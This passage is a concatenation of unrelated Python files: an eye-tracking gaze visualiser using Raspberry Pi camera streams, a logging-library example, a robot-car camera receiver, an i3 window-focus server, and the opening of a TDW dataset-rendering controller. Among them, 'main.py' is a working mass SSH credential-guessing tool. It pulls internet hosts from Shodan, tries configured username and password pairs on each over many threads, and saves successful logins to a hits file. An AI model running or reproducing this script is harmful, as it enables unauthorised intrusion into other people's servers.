from cameras import cam1dcoef as distCoeffs1
cameraMatrix0 = np.array(cameraMatrix0)
distCoeffs0 = np.array(distCoeffs0)
cameraMatrix1 = np.array(cameraMatrix1)
distCoeffs1 = np.array(distCoeffs1)
# from cameras import cam1mat as cameraMatrix1
# from cameras import cam1dcoef as distCoeffs1
TIMEOUT = 10000
FFMPEG_BIN = "ffmpeg"
'''
This code opens fast, low-latency streams and captures and saves frames
from webcams and networked Raspberry Pis.
The Readme.txt in this directory will help with debugging.
'''
class WebcamVideoStream:
def __init__(self, src=None, fifo=None):
# initialize the video camera stream and read the first frame
# from the stream
# self.stream = cv2.VideoCapture(src)
# (self.grabbed, self.frame) = self.stream.read()
###
        if not fifo:
            # default to the eye-camera pipe if none was specified
            fifo = 'fifo0'
            print("no input given, using fifo0")
        if fifo == 'fifo0':
            self.height = 640
            self.width = 480
        elif fifo == 'fifo1':
            self.height = 480
            self.width = 640
        else:
            print('error: please specify a known camera type (fifo0 or fifo1)')
            raise Exception('unknown fifo: %r' % fifo)
print("about to init command")
command = [
FFMPEG_BIN,
'-i',
fifo,
'-pix_fmt',
'bgr24', # opencv requires bgr24 pixel format.
'-vcodec',
'rawvideo',
'-an',
'-sn',
'-f',
'image2pipe',
'-'
] # '-framerate', '100',
print("about to sp.popen")
self.pipe = sp.Popen(command, stdout=sp.PIPE, bufsize=1024)
print("about read first frame")
try:
raw_image = self.pipe.stdout.read(self.height * self.width * 3)
            # np.fromstring is deprecated; np.frombuffer parses the raw bgr24 bytes
            self.image = np.frombuffer(
                raw_image, dtype='uint8'
            ).reshape((self.height, self.width, 3))
except Exception:
self.image = np.zeros((self.height, self.width, 3))
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
print("starting thread")
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
print("starting while true loop")
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
self.pipe.kill()
return
raw_image = self.pipe.stdout.read(self.height * self.width * 3)
            self.image = np.frombuffer(
                raw_image, dtype='uint8'
            ).reshape((self.height, self.width, 3))
self.pipe.stdout.flush()
# otherwise, read the next frame from the stream
# (self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.image
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def draw_ellipse(
img,
center,
axes,
angle,
startAngle,
endAngle,
color,
thickness=3,
lineType=cv2.LINE_AA,
shift=10
):
center = (int(round(center[0] * 2**shift)), int(round(center[1] * 2**shift)))
axes = (int(round(axes[0] * 2**shift)), int(round(axes[1] * 2**shift)))
cv2.ellipse(
img,
center,
axes,
angle,
startAngle,
endAngle,
color,
thickness,
lineType,
shift,
)
class Frame(object):
def __init__(self, camType):
if camType == 0:
self.height = 640
self.width = 480
elif camType == 1:
self.height = 480
self.width = 640
self.gray = np.zeros((self.height, self.width))
self.img = np.zeros((self.height, self.width, 3))
self.timestamp = time.time()
def solveperp(objectPoints, imagePoints, cameraMatrix, distCoeffs, method):
if method == 1:
return cv2.solvePnP(objectPoints, imagePoints, cameraMatrix, distCoeffs)
elif method == 2:
return cv2.solvePnPRansac(objectPoints, imagePoints, cameraMatrix, distCoeffs)
else:
return cv2.solveP3P(objectPoints, imagePoints, cameraMatrix, distCoeffs)
def draw_gaze(img, start, end, H, K, dist):
# unit is mm
try:
rvec, _ = cv2.Rodrigues(H[:3, :3])
tvec = H[:3, 3]
points = np.float32([
start,
end,
]).reshape(-1, 3)
axisPoints, _ = cv2.projectPoints(points, rvec, tvec, K, dist)
img = cv2.arrowedLine(
img, tuple(axisPoints[0].ravel()), tuple(axisPoints[1].ravel()),
(0, 255, 0), 3
)
except OverflowError:
pass
return img
def draw_plane(img, corners, H, K, dist):
# unit is mm
try:
rvec, _ = cv2.Rodrigues(H[:3, :3])
tvec = H[:3, 3]
points = np.float32(corners).reshape(-1, 3)
axisPoints, _ = cv2.projectPoints(points, rvec, tvec, K, dist)
img = cv2.arrowedLine(
img, tuple(axisPoints[0].ravel()), tuple(axisPoints[1].ravel()),
(0, 0, 255), 3
)
img = cv2.arrowedLine(
img, tuple(axisPoints[1].ravel()), tuple(axisPoints[2].ravel()),
(255, 0, 0), 3
)
img = cv2.arrowedLine(
img, tuple(axisPoints[2].ravel()), tuple(axisPoints[3].ravel()),
(255, 0, 0), 3
)
img = cv2.arrowedLine(
img, tuple(axisPoints[3].ravel()), tuple(axisPoints[0].ravel()),
(255, 0, 0), 3
)
except OverflowError:
pass
return img
def lineIntersection(planePoint, planeNormal, linePoint, lineDirection):
if np.dot(planeNormal, lineDirection) == 0:
return planePoint
t = (np.dot(planeNormal, planePoint) -
np.dot(planeNormal, linePoint)) / np.dot(planeNormal, lineDirection)
return linePoint + t * lineDirection
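# Example (editor's sketch): intersecting a line through the origin with
# direction (0, 0, 1) against the plane z == 5 (plane point (0, 0, 5),
# normal (0, 0, 1)) gives the expected point (0, 0, 5).
#
#   >>> lineIntersection(np.array([0., 0., 5.]), np.array([0., 0., 1.]),
#   ...                  np.array([0., 0., 0.]), np.array([0., 0., 1.]))
#   array([0., 0., 5.])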
# class Roi(object):
# """this is a simple 2D Region of Interest class
# it is applied on numpy arrays for convenient slicing
# like this:
# roi_array_slice = full_array[r.view]
# # do something with roi_array_slice
# this creates a view, no data copying done
# """
# def __init__(self, array_shape):
# self.array_shape = array_shape
# self.lX = 0
# self.lY = 0
# self.uX = array_shape[1]
# self.uY = array_shape[0]
# self.nX = 0
# self.nY = 0
# open a named pipe for each pi and start listening
pipeinit0 = sp.Popen(['./r0.sh'], stdout=sp.PIPE)
pipeinit1 = sp.Popen(['./r1.sh'], stdout=sp.PIPE)
# start streaming from the pi to this computer
sshPi0 = sp.Popen(['ssh', 'pi@10.0.0.3', '-p', '6622', '~/stream.sh'], stdout=sp.PIPE)
vs0 = WebcamVideoStream(fifo="fifo0").start()
print()
print()
print('Fifo 0 started')
print()
print()
sshPi1 = sp.Popen(['ssh', 'pi@10.0.0.5', '~/stream.sh'], stdout=sp.PIPE)
vs1 = WebcamVideoStream(fifo="fifo1").start()
print()
print()
print('Fifo 1 started')
print()
print()
# i = 0
# j = 0
frame = Frame(0)
roi = Roi(frame.img.shape)
cv2.namedWindow('Video0')
cv2.namedWindow('Video1')
# cv2.namedWindow('aruco')
vout0 = None
vout1 = None
if len(sys.argv) > 1:
fourcc = cv2.VideoWriter_fourcc(*'x264')
vout0 = cv2.VideoWriter(
'demo0.mp4', fourcc, 24.0, (frame.img.shape[1], frame.img.shape[0])
)
vout1 = cv2.VideoWriter(
'demo1.mp4', fourcc, 24.0, (frame.img.shape[0], frame.img.shape[1])
)
# ACTUAL STUFF BELOW
pupil_detector = Detector_3D()
pupil_detector.set_2d_detector_property('pupil_size_max', 150)
# pupil_detector.set_2d_detector_property('pupil_size_min', 10)
# pupil_detector.set_2d_detector_property('ellipse_roundness_ratio', 0.1)
# pupil_detector.set_2d_detector_property('coarse_filter_max', 240)
# pupil_detector.set_2d_detector_property('intensity_range', 30)
# pupil_detector.set_2d_detector_property('canny_treshold', 200)
# pupil_detector.set_2d_detector_property('canny_ration', 3)
# pupil_detector.set_2d_detector_property('support_pixel_ratio_exponent', 3.0)
# pupil_detector.set_2d_detector_property('initial_ellipse_fit_treshhold', 1.5)
'''
'coarse_detection': True,
'coarse_filter_min': 128,
'coarse_filter_max': 280,
'intensity_range': 23,
'blur_size': 5,
'canny_treshold': 160,
'canny_ration': 2,
'canny_aperture': 5,
'pupil_size_max': 100,
'pupil_size_min': 10,
'strong_perimeter_ratio_range_min': 0.8,
'strong_perimeter_ratio_range_max': 1.1,
'strong_area_ratio_range_min': 0.6,
'strong_area_ratio_range_max': 1.1,
'contour_size_min': 5,
'ellipse_roundness_ratio': 0.1,
'initial_ellipse_fit_treshhold': 1.8,
'final_perimeter_ratio_range_min': 0.6,
'final_perimeter_ratio_range_max': 1.2,
'ellipse_true_support_min_dist': 2.5,
'support_pixel_ratio_exponent': 2.0
'''
objPoints = np.array(
[(0, 0, 0), (536.575, 0, 0), (536.575, -361.95, 0), (0, -361.95, 0)]
)
UNITS_E = 1 # mm per box
UNITS_W = 14 # mm per box
Hoff = np.eye(4)
Hoff[:3, 3] = np.array([-1.06, -1.28, 0.0])
HoffW = np.eye(4)
HoffW[:3, 3] = np.array([-168.0, -100.0, -235.0])
HEW = np.eye(4)
# R = np.array([78.69,90.0,180+39.67])
R = np.array([-14.0, 40.0, 143]) # ********** DONT DELETE
HEW[:3, :3] = cv2.Rodrigues(R)[0]
HEW[:3, 3] = np.array([-58.58, -18.19, 32.47])
# H90 = np.eye(4)
# H90[:3,:3] = cv2.Rodrigues(np.array([0.0,0.0,0.0]))[0]
# Z = 1000
markdict = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_6X6_250)
arucoParams = cv2.aruco.DetectorParameters_create()
# TODO edit default params
rvecM = [0.0, 0.0, 0.0]
tvecM = [0.0, 0.0, 0.0]
plane = None
# aruco
def getNewArucoImg():
markerSize = 93
outimg = cv2.aruco.drawMarker(markdict, 5, markerSize)
height = 1050
width = 1680
bigPic = np.ones((height, width))
# random offset
yo = np.random.randint(0, width - markerSize)
xo = np.random.randint(0, height - markerSize)
bigPic[xo:xo + markerSize, yo:yo + markerSize] = outimg
return bigPic, (xo + markerSize / 2, yo + markerSize / 2)
# aflag = True
# HEATMAP
def gkern(kernlen, sigma):
# First a 1-D Gaussian
lim = kernlen // 2 + (kernlen % 2) / 2
t = np.linspace(-lim, lim, kernlen)
bump = np.exp(-0.25 * (t / sigma)**2)
bump /= np.trapz(bump) # normalize the integral to 1
# make a 2-D kernel out of it
return bump[:, np.newaxis] * bump[np.newaxis, :]
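# Example (editor's sketch): the kernel used for the heatmap below is square,
# peaks at its centre, and (because the 1-D bump is normalised with np.trapz)
# sums to roughly 1 before the gain factor is applied.
#
#   >>> k = gkern(2 * 200 + 1, 30)
#   >>> k.shape
#   (401, 401)
#   >>> bool(k[200, 200] == k.max())
#   True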
img0 = np.zeros((1050, 1680, 3))
img1 = np.zeros((1050, 1680, 3))
radius = 200
sigma = 30
gain = 500
decay = 1.007
mask = gkern(2 * radius + 1, sigma) * gain
cv2.namedWindow('heatmap')
curpos = [int(img1.shape[0] / 2), int(img1.shape[1] / 2)]
# MAIN LOOP
while True:
image0 = vs0.read()
image1 = vs1.read()
if image0 is not None:
# image0 = cv2.rotate(image0, cv2.ROTATE_90_CLOCKWISE)
frame.gray = cv2.cvtColor(image0, cv2.COLOR_BGR2GRAY)
frame.img = image0.copy()
prevImage = image0.copy()
frame.timestamp = time.time()
else:
frame.img = prevImage.copy()
frame.gray = cv2.cvtColor(prevImage, cv2.COLOR_BGR2GRAY)
frame.timestamp = time.time()
if image1 is not None:
image1 = cv2.rotate(image1, cv2.ROTATE_180)
prevImage1 = image1.copy()
else:
image1 = prevImage1
corners, ids, rejected = cv2.aruco.detectMarkers(
image1, markdict, cameraMatrix=cameraMatrix1, distCoeff=distCoeffs1
)
# print(corners)
# print('ids:',ids)
image1 = cv2.aruco.drawDetectedMarkers(image1, corners, ids, (255, 0, 255))
rvecsC, tvecsC, _ = cv2.aruco.estimatePoseSingleMarkers(
corners, 50, cameraMatrix1, distCoeffs1
)
# print(rvecsC)
# print("individual t vecs: ",tvecsC)
if ids is not None and len(corners) == len(ids) == 4:
imgPoints = np.array([corners[x] for x in ids.T[0].argsort()])
plane = np.array([tvecsC[x][0][:] for x in ids.T[0].argsort()])
# gazepoint = plane[4]
# plane = plane[:4]
print("Monitor: ", plane)
# print("3d gaze point: ",gazepoint)
# retval, rvecM, tvecM = solveperp(objPoints, imgPoints, cameraMatrix1,
# distCoeffs1, 1)
result = pupil_detector.detect(frame, roi, True)
draw_ellipse(
frame.img, result['ellipse']['center'],
[x / 2 for x in result['ellipse']['axes']], result['ellipse']['angle'], 0, 360,
(255, 255, 0), 2
)
sphere = np.array(result['sphere']['center'])
pupil = np.array(result['circle_3d']['center'])
print("sphere: ", sphere)
print("pupil: ", pupil)
draw_gaze(frame.img, sphere, pupil, Hoff, cameraMatrix0, distCoeffs0)
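# Gaze geometry: map the eyeball centre and pupil from eye-camera to
# world-camera coordinates with H_all = Hoff @ HEW @ HoffW, form the gaze
# ray (pupil2 - sphere2), and intersect it with the monitor plane (point
# plane[0], normal from the cross product of two plane edges) to get the
# 2-D gaze point on the screen.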
HEW[:3, :3] = cv2.Rodrigues(R)[0]
H_all = Hoff @ HEW @ HoffW
# print(H_all)
sphere2 = H_all[:3, :3] @ sphere + H_all[:3, 3]
pupil2 = H_all[:3, :3] @ pupil + H_all[:3, 3]
pupil2[0] *= -1
sphere2[0] *= -1
# pupil2 *= UNITS_E/UNITS_W
# sphere2 *= UNITS_E/UNITS_W
# print("sphere2: ", sphere2)
# print("pupil2: ", pupil2)
gaze = pupil2 - sphere2
if plane is None:
plane = objPoints.copy()
plane[:, 0] -= 536.575 / 2
plane[:, 1] += 361.95 / 2
plane /= UNITS_W
plane[:, 2] = 10000
# print("Plane: ",plane)
draw_plane(image1, plane[0:4], np.eye(4), cameraMatrix1, distCoeffs1)
gazeEnd = lineIntersection(
plane[0], np.cross(plane[1] - plane[0], plane[2] - plane[1]), pupil2, gaze
)
gazepoint2d = np.abs(plane[1] - gazeEnd)[:2] * 2
print(gazepoint2d)
curpos = [int(gazepoint2d[1]), int(gazepoint2d[0])]  # [int(x) for x in gazepoint2d]
xn = max(curpos[0] - radius, 0)
yn = max(curpos[1] - radius, 0)
xm = min(curpos[0] + radius + 1, img1.shape[0])
ym = min(curpos[1] + radius + 1, img1.shape[1])
kxn = radius - (curpos[0] - xn)
kyn = radius - (curpos[1] - yn)
kxm = radius + xm - curpos[0]
kym = radius + ym - curpos[1]
# print(curpos)
# print((xn, yn), ' ', (xm, ym))
# print((kxn, kyn), ' ', (kxm, kym))
try:
img1[xn:xm, yn:ym, 0] += mask[kxn:kxm, kyn:kym]
img1[xn:xm, yn:ym, 1] -= mask[kxn:kxm, kyn:kym] / 4
img1[xn:xm, yn:ym, 2] -= mask[kxn:kxm, kyn:kym] / 2
img1[:, :, :] /= decay
cv2.imshow('preview', img0 + img1)
except Exception as e:
print(e)
# gazeEnd2 = gazeEnd + 2*gaze
# print("Cross: ", np.cross(plane[1]-plane[0],plane[2]-plane[1]))
# print("GazeE: ", gazeEnd)
# print("GazeE2: ", gazeEnd2)
# print("R: ", R)
print("Hoff: ", Hoff)
print("HoffW: ", HoffW)
draw_gaze(image1, pupil, gazeEnd, np.eye(4), cameraMatrix1, distCoeffs1)
# draw_gaze(
# image1, gazeEnd, gazeEnd2, np.eye(4),
# cameraMatrix1, distCoeffs1
# )
image1 = cv2.aruco.drawAxis(
image1, cameraMatrix1, distCoeffs1,
cv2.Rodrigues(H_all[:3, :3])[0], plane[0], 100
)
if image0 is not None:
cv2.imshow('Video0', frame.img)
if vout0:
vout0.write(frame.img)
if image1 is not None:
cv2.imshow('Video1', image1)
if vout1:
vout1.write(image1)
# if aflag == True:
# aimg,(xxx,yyy)= getNewArucoImg()
# cv2.imshow("aruco", aimg)
# print('the x and y of the center aruco img',xxx ,' ',yyy)
# aflag = False
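# Manual calibration keys: h/j and k/l nudge the eye-camera offset Hoff,
# t/y, u/i and o/p adjust the eye-to-world rotation R, x/c, v/b and n/m
# shift the world-camera offset HoffW, and q quits.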
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
elif key & 0xFF == ord('h'):
Hoff[:3, 3][0] += 0.02
elif key & 0xFF == ord('j'):
Hoff[:3, 3][0] -= 0.02
elif key & 0xFF == ord('k'):
Hoff[:3, 3][1] += 0.02
elif key & 0xFF == ord('l'):
Hoff[:3, 3][1] -= 0.02
elif key & 0xFF == ord('t'):
R[0] += 1.0
elif key & 0xFF == ord('y'):
R[0] -= 1.0
elif key & 0xFF == ord('u'):
R[1] += 1.0
elif key & 0xFF == ord('i'):
R[1] -= 1.0
elif key & 0xFF == ord('o'):
R[2] += 1.0
elif key & 0xFF == ord('p'):
R[2] -= 1.0
elif key & 0xFF == ord('x'):
HoffW[:3, 3][0] += 1.02
elif key & 0xFF == ord('c'):
HoffW[:3, 3][0] -= 1.02
elif key & 0xFF == ord('v'):
HoffW[:3, 3][1] += 1.02
elif key & 0xFF == ord('b'):
HoffW[:3, 3][1] -= 1.02
elif key & 0xFF == ord('n'):
HoffW[:3, 3][2] += 1.02
elif key & 0xFF == ord('m'):
HoffW[:3, 3][2] -= 1.02
# elif key & 0xFF == ord('a'):
# aflag = True
# elif key & 0xFF == ord('z'):
# Z += 1
# elif key & 0xFF == ord('x'):
# Z -= 1
elif key == 32: # spacebar: snapshot saving (currently commented out below)
# cv2.imwrite('photos/0-'+str(time)+'.png', image0)
# cv2.imwrite('photos/1-'+str(time)+'.png', image1)
# time += 1
pass
if vout0:
vout0.release()
if vout1:
vout1.release()
cv2.destroyAllWindows()
time.sleep(0.5)
vs0.stop()
vs1.stop()
|
example.py
|
from lamp import MatplotScalarHandler
from lamp import MatplotImageHandler
from lamp import DataLogger
from lamp import VisdomScalarHandler
from lamp import VisdomImageHandler
from lamp import VisdomHistHandler
from lamp import VisdomParameterHandler
import logging
import numpy as np
import torch
def matplothandlers():
logging.setLoggerClass(DataLogger)
my_logger = logging.getLogger(__name__)
handlerscalar = MatplotScalarHandler()
handlerimage = MatplotImageHandler()
my_logger.addHandler(handlerscalar)
my_logger.addHandler(handlerimage)
my_logger.setLevel(logging.DEBUG)
my_logger.image(np.random.uniform(size=(32, 32)), cmap="gray")
for i in range(50):
my_logger.scalar(i**2)
def vizdomhandlers():
logging.setLoggerClass(DataLogger)
my_logger = logging.getLogger(__name__)
vizscalarhandler = VisdomScalarHandler(logging.DATA,
overwrite_window=True)
vizhisthandler = VisdomHistHandler(logging.DATA,
overwrite_window=True)
my_logger.addHandler(vizscalarhandler)
my_logger.addHandler(vizhisthandler)
my_logger.setLevel(logging.DATA)
for i in range(10):
my_logger.scalar(i**2, win="polynomial", trace="x^2")
my_logger.scalar(i**2-5*i + 2, win="polynomial", trace="x^2 - 5x + 2")
gauss_vector = torch.randn(500)
my_logger.histogram(gauss_vector, win="Normal distribution")
def multiprocessing_vizdom():
import time
import random
from math import log
import numpy as np
import scipy.stats as stats
from torch.multiprocessing import Manager
from torch.multiprocessing import Process
manager = Manager()
logging.setLoggerClass(DataLogger)
my_logger = logging.getLogger(__name__)
vizscalarhandler = VisdomScalarHandler(
logging.DATA, overwrite_window=True, manager=manager)
my_logger.addHandler(vizscalarhandler)
my_logger.setLevel(logging.DATA)
def func(logger, j):
for i in np.linspace(-5, 5, 200):
value = stats.norm(j/5-2.5, 1).pdf(i*(1+j/10))
logger.scalar(value, index=i, env="main",
win="normal-pdf", trace="trace-" + str(j))
p_list = []
for i in range(10):
p = Process(target=func, args=(my_logger, i))
p_list.append(p)
p.start()
for p in p_list:
p.join()
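# In multiprocessing_vizdom() above, every worker process logs through the same
# DataLogger; the torch.multiprocessing Manager handed to VisdomScalarHandler is
# presumably what lets the handler share its plotting state across processes.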
if __name__ == "__main__":
vizdomhandlers()
# matplothandlers()
# multiprocessing_vizdom()
|
camerareceiver.py
|
# Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import sys
sys.path.append('.')
import time
import socket
import struct
import numpy as np
import cv2
from threading import Thread
import multiprocessing
from multiprocessing import Process,Event
from src.utils.templates.workerprocess import WorkerProcess
class CameraReceiver(WorkerProcess):
# ===================================== INIT =========================================
def __init__(self, inPs, outPs):
"""Process used for debugging. It receives the images from the raspberry and
duplicates the perception pipline that is running on the raspberry.
Parameters
----------
inPs : list(Pipe)
List of input pipes
outPs : list(Pipe)
List of output pipes
"""
super(CameraReceiver,self).__init__(inPs, outPs)
self.port = 2244
self.serverIp = '0.0.0.0'
self.imgSize = (480,640,3)
#self.frame_counter = 0
self.out_video = cv2.VideoWriter('/home/keith/Desktop/rpi_video.mp4',cv2.VideoWriter_fourcc('a','v','c','1'),10,(self.imgSize[1],self.imgSize[0])) # VideoWriter expects (width, height)
#self.out_video = cv2.VideoWriter('/home/keith/Desktop/rpi_video.mp4',cv2.VideoWriter_fourcc('H','2','6','4'),10,(self.imgSize[1],self.imgSize[0]))
#self.out_video = cv2.VideoWriter('/home/keith/Desktop/rpi_video.mp4',cv2.VideoWriter_fourcc('M','P','4','V'),10,(self.imgSize[1],self.imgSize[0]))
#self.out_video = cv2.VideoWriter('/home/keith/Desktop/rpi_video.avi',cv2.VideoWriter_fourcc('M','J','P','G'),10,(self.imgSize[1],self.imgSize[0]))
# ===================================== RUN ==========================================
def run(self):
"""Apply the initializers and start the threads.
"""
self._init_socket()
super(CameraReceiver,self).run()
# ===================================== INIT SOCKET ==================================
def _init_socket(self):
"""Initialize the socket.
"""
self.server_socket = socket.socket()
self.server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.server_socket.bind((self.serverIp, self.port))
self.server_socket.listen(0)
self.connection = self.server_socket.accept()[0].makefile('rb')
# ===================================== INIT THREADS =================================
def _init_threads(self):
"""Initialize the read thread to receive the video.
"""
readTh = Thread(name = 'StreamReceiving',target = self._read_stream, args = (self.outPs, ))
self.threads.append(readTh)
# ===================================== READ STREAM ==================================
def _read_stream(self, outPs):
"""Read the image from input stream, decode it and show it.
Parameters
----------
outPs : list(Pipe)
output pipes (not used at the moment)
"""
try:
while True:
# decode image
image_len = struct.unpack('<L', self.connection.read(struct.calcsize('<L')))[0]
bts = self.connection.read(image_len)
# ----------------------- read image -----------------------
image = np.frombuffer(bts, np.uint8)
image = cv2.imdecode(image, cv2.IMREAD_COLOR)
image = np.reshape(image, self.imgSize)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
#self.out_video.write(image)
#grey = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# Make the grey scale image have three channels
#grey_3_channel = cv2.cvtColor(grey, cv2.COLOR_GRAY2BGR)
#processed=process_image(image)
hor_concat = np.hstack((image, image))
# ----------------------- show images -------------------
#cv2.imshow('Image', hor_concat)
#frame_filename="~/Desktop/frame%d.jpg"%self.frame_counter
#cv2.imwrite(frame_filename,image)
#print(self.frame_counter)
#np.save(frame_filename,image)
#cv2.imshow('Image',image)
#self.frame_counter+=1
self.out_video.write(image)
cv2.waitKey(1)
except:
pass
finally:
self.connection.close()
self.server_socket.close()
self.out_video.release()
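# Wire format read above: each frame arrives as a 4-byte little-endian length
# ('<L') followed by that many bytes of encoded image data. A minimal sender
# sketch (hypothetical, not part of this file) would be:
#
# data = cv2.imencode('.jpg', frame)[1].tobytes()
# connection.write(struct.pack('<L', len(data)))
# connection.write(data)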
|
history-server.py
|
#!/usr/bin/env python3
import os
import socket
import selectors
import threading
import json
from argparse import ArgumentParser
import i3ipc
MAX_WIN_HISTORY = 15
parser = ArgumentParser(prog='i3-app-focus.py', description='''''', epilog='''''')
parser.add_argument('--socket-file', default='/tmp/i3-app-focus.socket', help='Socket file path')
(args, other) = parser.parse_known_args()
class FocusWatcher:
def __init__(self):
self.i3 = i3ipc.Connection()
self.i3.on('window::focus', self._on_window_focus)
self.listening_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
if os.path.exists(args.socket_file):
os.remove(args.socket_file)
self.listening_socket.bind(args.socket_file)
self.listening_socket.listen(2)
self.window_list = []
self.window_list_lock = threading.RLock()
def run(self):
t_i3 = threading.Thread(target=self._launch_i3)
t_server = threading.Thread(target=self._launch_server)
for t in (t_i3, t_server):
t.start()
def _on_window_focus(self, i3conn, event):
window_id = event.container.id
con = self.i3.get_tree().find_by_id(window_id)
if not self._is_window(con):
return
with self.window_list_lock:
if window_id in self.window_list:
self.window_list.remove(window_id)
self.window_list.insert(0, window_id)
if len(self.window_list) > MAX_WIN_HISTORY:
del self.window_list[MAX_WIN_HISTORY:]
def _launch_i3(self):
self.i3.main()
def _launch_server(self):
selector = selectors.DefaultSelector()
def accept(sock):
conn, addr = sock.accept()
tree = self.i3.get_tree()
info = []
with self.window_list_lock:
for window_id in self.window_list:
con = tree.find_by_id(window_id)
if con:
info.append({
"id": con.id,
"window": con.window,
"window_title": con.window_title,
"window_class": con.window_class,
"window_role": con.window_role,
"focused": con.focused
})
conn.send(json.dumps(info).encode())
conn.close()
selector.register(self.listening_socket, selectors.EVENT_READ, accept)
while True:
for key, event in selector.select():
callback = key.data
callback(key.fileobj)
@staticmethod
def _is_window(con):
return not con.nodes and con.type == "con" and (con.parent and con.parent.type != "dockarea"
or True)
focus_watcher = FocusWatcher()
focus_watcher.run()
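# A client just connects to the UNIX socket and reads one JSON document, e.g.
# (hypothetical usage sketch):
#
# import socket, json
# s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# s.connect('/tmp/i3-app-focus.socket')
# history = json.loads(s.makefile().read())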
|
main.py
|
import json, threading, socket, time
import shodan, paramiko
config = json.loads(open('config.json', 'r').read())
api = shodan.Shodan(config['shodan'])
already_seen = []
servers = []
def loop():
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
for server in servers:
host = server['ip_str']
if host not in already_seen:
for credential in config['credentials']:
username, password = credential['username'], credential['password']
try:
client.connect(hostname=host, username=credential['username'], password=credential['password'], timeout=config['timeout'], banner_timeout=200)
print(f'cracked login for {host}')
with open('hits.txt', 'a+') as f:
f.write(f'{username}:{password} @ {host}\n')
break
except paramiko.SSHException:
continue
except paramiko.AuthenticationException:
continue
except:
print('unhandled exception')
break
already_seen.append(host)
if __name__ == '__main__':
result = api.search("ssh")
total = '{0:,}'.format(result['total'])
print(f'found {total} servers running ssh')
servers = result['matches']
threads = []
for i in range(config['threads']):
thread = threading.Thread(target=loop, daemon=True)
threads.append(thread)
thread.start()
print(f'created thread #{i + 1}')
for thread in threads:
thread.join()
print('joined thread')
|
single_object.py
|
from tdw.controller import Controller
from tdw.tdw_utils import TDWUtils
from tdw.output_data import IdPassGrayscale, Images, ImageSensors, Environments, OutputData, Transforms
from tdw.librarian import ModelLibrarian, MaterialLibrarian, HDRISkyboxLibrarian, ModelRecord, HDRISkyboxRecord
import numpy as np
from tqdm import tqdm
import os
from subprocess import call
from secrets import token_urlsafe
from pathlib import Path
import json
from datetime import datetime
from threading import Thread
from time import time
from typing import List, Dict
RNG = np.random.RandomState(0)
class ImagePosition:
"""
Data to stage an image.
"""
def __init__(self, avatar_position: dict,
camera_rotation: dict,
object_position: dict,
object_rotation: dict):
"""
:param avatar_position: The position of the avatar as a Vector3.
:param camera_rotation: The rotation of the avatar as a Quaternion.
:param object_position: The position of the object as a Vector3.
:param object_rotation: The rotation of the object as a Quaternion.
"""
self.avatar_position = avatar_position
self.camera_rotation = camera_rotation
self.object_position = object_position
self.object_rotation = object_rotation
class Environment:
"""
Environment data for a single environment.
"""
def __init__(self, envs: Environments, e: int):
"""
:param envs: The environments data.
:param e: The index of this environment.
"""
self.x, _, self.z = envs.get_center(e)  # the centre's y component is unused
self.w, self.h, self.l = envs.get_bounds(e)
class SingleObject(Controller):
def __init__(self,
port=1071,
launch_build=False,
visual_material_swapping=False,
new=False,
screen_size=256,
output_size=256,
hdri=False,
show_objects=True,
clamp_rotation=False,
max_height=1.0,
grayscale_threshold=0.5,
less_dark=False,
id_pass=False,
no_overwrite=False,
do_zip=False,
train=1300000,
val=50000,
library="models_full.json",
temp_urls: bool = False):
"""
:param port: The port used to connect to the build.
:param launch_build: If True, automatically launch the build. Always set this to False on a Linux server.
:param visual_material_swapping: If true, set random visual materials per frame.
:param new: If true, clear the list of models that have already been used.
:param screen_size: The screen size of the build.
:param output_size: The size of the output images.
:param hdri: If true, use a random HDRI skybox per frame.
:param show_objects: If true, show objects.
:param clamp_rotation: If true, clamp the rotation to +/- 30 degrees around each axis.
:param max_height: The percentage of the environment height that is the ceiling for the avatar and object. Must be between 0 and 1.
:param grayscale_threshold: The grayscale threshold. Higher value = slower FPS, better composition. Must be between 0 and 1.
:param less_dark: If true, there will be more daylight exterior skyboxes (requires hdri == True)
:param id_pass: If true, send the _id pass.
:param no_overwrite: If true, don't overwrite images.
:param do_zip: If true, zip the directory at the end.
:param train: Number of train images.
:param val: Number of val images.
:param library: The path to the library records file.
:param temp_urls: If True, the build will use temporary (pre-signed) URLs to download models in the tdw-private bucket.
"""
